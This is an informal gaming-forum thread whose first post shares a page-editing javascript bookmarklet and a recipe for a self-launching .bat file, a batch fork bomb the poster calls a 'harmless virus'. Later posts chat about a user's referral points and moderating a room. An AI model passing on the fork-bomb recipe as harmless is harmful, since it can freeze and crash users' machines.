Forums Kongregate

Im not that serious

5 posts

Flag Post

Ive just red congregatee(Jude’s blog)and since jude wouldnt stop blabering how serious i am i decided to make this ok.
First heres a little code that you can mess around for some time javascript:document.body.contentEditable=‘true’; document.designMode=‘on’; void 0
ok heres what you do go to any site at all and put this code in the place where you input the site and press ENTER and if you check it out you will see that you can move the pictures and rewrite the text its fun to mess around with this a little.
Next a script for a small ehem harmless virus awsomely easy to make.You open up a new text document and write
start “(somethingofyourchoice).bat” (thesamething).bat"
then go to file>save as and save it as (thesamething).bat
remember somethingofyourchoice must be swicthed with well something of your choice.
Im not serious idont even know why Jude would think that happy holidays.

Flag Post

oh yea doesnt anyone think that all the points jayisgames(the one wih the highest lvl on kong)he got from referal bonuses is kinda suspecious

Flag Post

He owns a gaming website. Tons of people visit it.

http://jayisgames.com/

Flag Post

Jayisgames is cool. It’s not a surprise to see a lot of points by referring to other people.

Well, you’re pretty serious. And you’re supposed to moderate my room when you’re away because you’re the “newest moderator but Kongregate didn’t know.” I do need some help if my room got big when I’m away or at some other random room.

Flag Post

ok cool